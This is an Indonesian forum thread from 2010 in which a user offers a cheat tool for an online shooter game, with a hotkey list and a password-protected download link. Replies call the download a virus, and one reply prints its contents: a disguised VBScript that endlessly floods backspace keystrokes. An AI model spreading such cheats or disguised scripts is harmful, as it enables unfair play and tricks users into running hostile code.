Forum Kita | Forum Untuk Semua
-=Selamat Datang di ForumKita.Net=-

Anda baru disini?
Untuk melihat seluruh isi Forum ini silahkan klik "Register" dibawah ini untuk mendaftar di forum ini!

Anda telah terdaftar disini?
Silahkan klik "Login" dibawah ini untuk masuk kedalam Forum!
Terima Kasih!


Regard's,

:: Team Forum Kita ::


Forum Kita bersama, Milik kita Bersama, Untuk Kita Bersama!
 
HomeSearchRegisterLog in

Share | 
 

 CHEAT EXP,TANPA *pe 10122010

View previous topic View next topic Go down 
Go to page : 1, 2  Next
AuthorMessage
rain
________________________
________________________


Posts : 67
Reputasi : 24
Join date : 2010-09-08
Age : 28
Location : p.siantar

PostSubject: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 12:47 pm

TUTOR :

[*] Hack Carackter : F1 [on]
[*] Hack Carackter : F2 [off]
[*] Exp Ngalir : F3 No BT/DC ( cheat Exp Tanpa *PE )
[*] Weapon Hack : F4
[*] RPG Mode : F5
[*] AI Mode : F7
[*] Ammo Dual kriss : F8 [on]
[*] Ammo Dual kriss : F9 [off]
[*] Wallhack : F10 [on]
[*] Wallhack : F11 [off]
[*] Wallshoot : F12 [on/off]
[*] Ammo : Ctrl kiri [on]
[*] Ammo : Ctrl kanan [off]
[*] Damage : Numpad * ( di numpad ) << Harus jadi RM <<
[*] Mega Box : Numpad / ( di numpad ) << Satu kali Login <<
[*] (one) 1 Hit : Home [on]
[*] (one) 1 Hit : End [off]
[*] Hack Dual Uzzy : Alt kiri
[*] Hack Pyton : Alt kanan
[*] Map Hack : Numpad 1-9
[*] ??? = Numpad 0

Create :

[*] Emunks
[*] Rullanz
[*] Dede
[*] Noval
[*] Harry
[*] Ali
[*] Bazka

>> ( SAY TO LECHER ) <<


PERHATIAN :
HATI-HATI.. KARENA LECHEER TELAH MEMASUKI FORUM INI ..??


Say TO Lecheer ..??


bounce bounce bounce bounce Arrow Arrow Arrow affraid affraid affraid affraid affraid affraid affraid

Maav Link Nya Lupa ...

Nic Link Nya Juga : Download
Pass : emunkscheaterz

Klo gax bsa yang ini Gan : http://www.ziddu.com/download/12903476/emunkscheaterz.rar.html

Pass : emunkscheaterz

Kalo Berguna Kasih ++++ Iyy Gan ..??

Cendol Nya...

I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia


Last edited by rain on Fri Dec 10, 2010 1:01 pm; edited 1 time in total
Back to top Go down
opik55
________________________
________________________


Posts : 60
Reputasi : -3
Join date : 2010-04-29

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 12:57 pm

Asli keren gan 5menit langsung mayor
cendor mengalir gan I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia I Love Indonesia
Back to top Go down
Ajhy
________________________
________________________


Posts : 45
Reputasi : 10
Join date : 2010-09-04
Age : 23
Location : Baturaja

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 1:16 pm

koq tidak dpat ditemukan??
Back to top Go down
H@cker.us
________________________
________________________


Posts : 28
Reputasi : -3
Join date : 2010-11-17
Location : Liberty

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 1:18 pm

jink dasar low nipu ajah.. rusak kompi gw ne.. ne bwat lo makan tuh BATA makan tuh BATA makan tuh BATA makan tuh BATA
Back to top Go down
http://clanpointblankthemcsabu.blogspot.com/
rain
________________________
________________________


Posts : 67
Reputasi : 24
Join date : 2010-09-08
Age : 28
Location : p.siantar

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 1:38 pm

Mampus Loe Leacher,Khusus Cheater Yang Bisa Ngatasi Masalah Gituan
Back to top Go down
rain
________________________
________________________


Posts : 67
Reputasi : 24
Join date : 2010-09-08
Age : 28
Location : p.siantar

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 1:39 pm

Mampus Loe Leacher,Khusus Cheater Yang Bisa Ngatasi Masalah Gituan
Back to top Go down
cacadslalu
________________________
________________________


Posts : 115
Reputasi : 4
Join date : 2010-09-28
Age : 25
Location : SUMEDANG

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 2:27 pm

nah yg ginian yg ngerusak citra CHETER tuh ... g nyadar kalo dirinya LECHER ... CHETER g sombong kaya Kamu, MEreka memberi ilmu bagi yg mau belajar ....

emang kamu udah bisa apa ???

ok ... kamu cheter hebat, tapi km juga sebelum jadi cheter pasti pernah ngerasain jadi lecherkan..?? ap loe juga pernah dikerjain kaya gini ama cheter asli..??

Maaf om momod bukan maksud mau JUNK, tapi saya mau menyadarkan lecher yang so so'an ngaku CHETER ....

INGAT CHETER NGGAK PERNAH MELAKUKAN HAL SEPERTI INI. MEREKA MEMBANTU MEMBERIKAN KITA PELAJARAN UNTUK BISA MENJADI CHETER DENGAN TUJUAN MENJADI GENERASINY.

Saya LECHER yang sedang belajar pada CHETER ....
Back to top Go down
rain
________________________
________________________


Posts : 67
Reputasi : 24
Join date : 2010-09-08
Age : 28
Location : p.siantar

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 2:38 pm

Asal Loe Tau Y...
We Gak Suka Lihat Co-Admin...
Gara-Gara We Share Cheat Npe2 Bagus-Bagus...
We Di Banned 5 Hari...
Padahal Yang Share Cheat sPE/rPE,Npe2 Banyak...
Tapi Gak Di Banned...
Maksud Nya Apa...
Gak Suka,Jgn Gitu Cranya...
Back to top Go down
H@cker.us
________________________
________________________


Posts : 28
Reputasi : -3
Join date : 2010-11-17
Location : Liberty

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 2:47 pm

LO tu YG LECHER. . NGASIH CHEAT KAGA BENER . . kan salah LU napa lu nge SHARE cheat RPE/NPE . . kan udh ada ATURANYA . . BACA DULU SEBELUM POSTING OM,.... NE kaga malah VIRUS d SHARE . NE BWAT LU SATU LAGI. . HoaX detected!
Back to top Go down
http://clanpointblankthemcsabu.blogspot.com/
H@cker.us
________________________
________________________


Posts : 28
Reputasi : -3
Join date : 2010-11-17
Location : Liberty

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 2:49 pm

cacadslalu wrote:
nah yg ginian yg ngerusak citra CHETER tuh ... g nyadar kalo dirinya LECHER ... CHETER g sombong kaya Kamu, MEreka memberi ilmu bagi yg mau belajar ....

emang kamu udah bisa apa ???

ok ... kamu cheter hebat, tapi km juga sebelum jadi cheter pasti pernah ngerasain jadi lecherkan..?? ap loe juga pernah dikerjain kaya gini ama cheter asli..??

Maaf om momod bukan maksud mau JUNK, tapi saya mau menyadarkan lecher yang so so'an ngaku CHETER ....

INGAT CHETER NGGAK PERNAH MELAKUKAN HAL SEPERTI INI. MEREKA MEMBANTU MEMBERIKAN KITA PELAJARAN UNTUK BISA MENJADI CHETER DENGAN TUJUAN MENJADI GENERASINY.

Saya LECHER yang sedang belajar pada CHETER ....


++++ BWAT LO GW STUJU
Back to top Go down
http://clanpointblankthemcsabu.blogspot.com/
ogenxz
________________________
________________________


Posts : 27
Reputasi : -1
Join date : 2010-09-12

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:01 pm

GAn SEdot nye GMN ?????? Nyengir! Nyengir! Nyengir! Nyengir! tanya tanya tanya tanya
Back to top Go down
ogenxz
________________________
________________________


Posts : 27
Reputasi : -1
Join date : 2010-09-12

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:02 pm

Thnks Gan................... tepuktangan tepuktangan tepuktangan
Back to top Go down
rido jendral
________________________
________________________


Posts : 57
Reputasi : 3
Join date : 2010-10-26

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:04 pm

tes gan
Back to top Go down
crash4
________________________
________________________


Posts : 3
Reputasi : 0
Join date : 2010-11-20

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:08 pm

kasih clue dikit gan....
kalo emank lw cheater kasih clue dikit,, gx ada cheater yang pelit gann..
cheaters sejati it berbagi ilmu sama yang gx bisa...
Back to top Go down
ogenxz
________________________
________________________


Posts : 27
Reputasi : -1
Join date : 2010-09-12

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:11 pm

betul tuh....... Nyengir! Nyengir! Nyengir! Nyengir!
Back to top Go down
ogenxz
________________________
________________________


Posts : 27
Reputasi : -1
Join date : 2010-09-12

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:12 pm

Malah KAU KaSIH pirusss cape dee cape dee cape dee
Back to top Go down
kumman
________________________
________________________


Posts : 9
Reputasi : 2
Join date : 2010-12-10

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:12 pm

thanks gan.... I Love Indonesia I Love Indonesia
Back to top Go down
kumman
________________________
________________________


Posts : 9
Reputasi : 2
Join date : 2010-12-10

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:13 pm

thanks gan.... I Love Indonesia I Love Indonesia
Back to top Go down
herwincute00
________________________
________________________


Posts : 62
Reputasi : 39
Join date : 2010-09-03
Age : 20
Location : Palembang

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:35 pm

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop



isi dalem inject'tornya waduh ccd

hahahah

cara ngatasin buka task manager

end task pada wscript ++
Back to top Go down
746997643
________________________
________________________


Posts : 8
Reputasi : 2
Join date : 2010-11-10

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:58 pm

cara pakenya gimana gan?? marah
Back to top Go down
rain
________________________
________________________


Posts : 67
Reputasi : 24
Join date : 2010-09-08
Age : 28
Location : p.siantar

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 4:58 pm

We Geram Lihat C0-Admin...
Banyak Yang Share Cheat Npe2,Tapi Gak Di Banned...
Back to top Go down
aaaadi
________________________
________________________


Posts : 10
Reputasi : 0
Join date : 2010-11-11

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 5:08 pm

stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid stupid wkkakwakawkwak
Back to top Go down
746997643
________________________
________________________


Posts : 8
Reputasi : 2
Join date : 2010-11-10

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 5:10 pm

citnya KROCO gan !! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! repost gan! makan tuh BATA makan tuh BATA makan tuh BATA makan tuh BATA makan tuh BATA sundul gan sundul gan sundul gan sundul gan sundul gan hammer
Back to top Go down
keong_mabok
________________________
________________________


Posts : 75
Reputasi : -4
Join date : 2010-08-16
Age : 17

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 5:23 pm

aq tes dulu gan
Back to top Go down
M4L4IK4T
________________________
________________________


Posts : 8
Reputasi : 0
Join date : 2010-12-08

PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Fri Dec 10, 2010 6:05 pm

I Love Indonesia I Love Indonesia I Love Indonesia
Damai SHOB................... Damaiiiiiiii HoaX detected!
Back to top Go down
Sponsored content




PostSubject: Re: CHEAT EXP,TANPA *pe 10122010   Today at 3:11 pm

Back to top Go down
 
CHEAT EXP,TANPA *pe 10122010
View previous topic View next topic Back to top 
Page 1 of 2Go to page : 1, 2  Next
 Similar topics
-
» Start pakai Jumping Cable or Push Turun Bukit

Permissions in this forum:You cannot reply to topics in this forum
Forum Kita | Forum Untuk Semua :: Game Online :: Cheat Update (Daily)-
Jump to: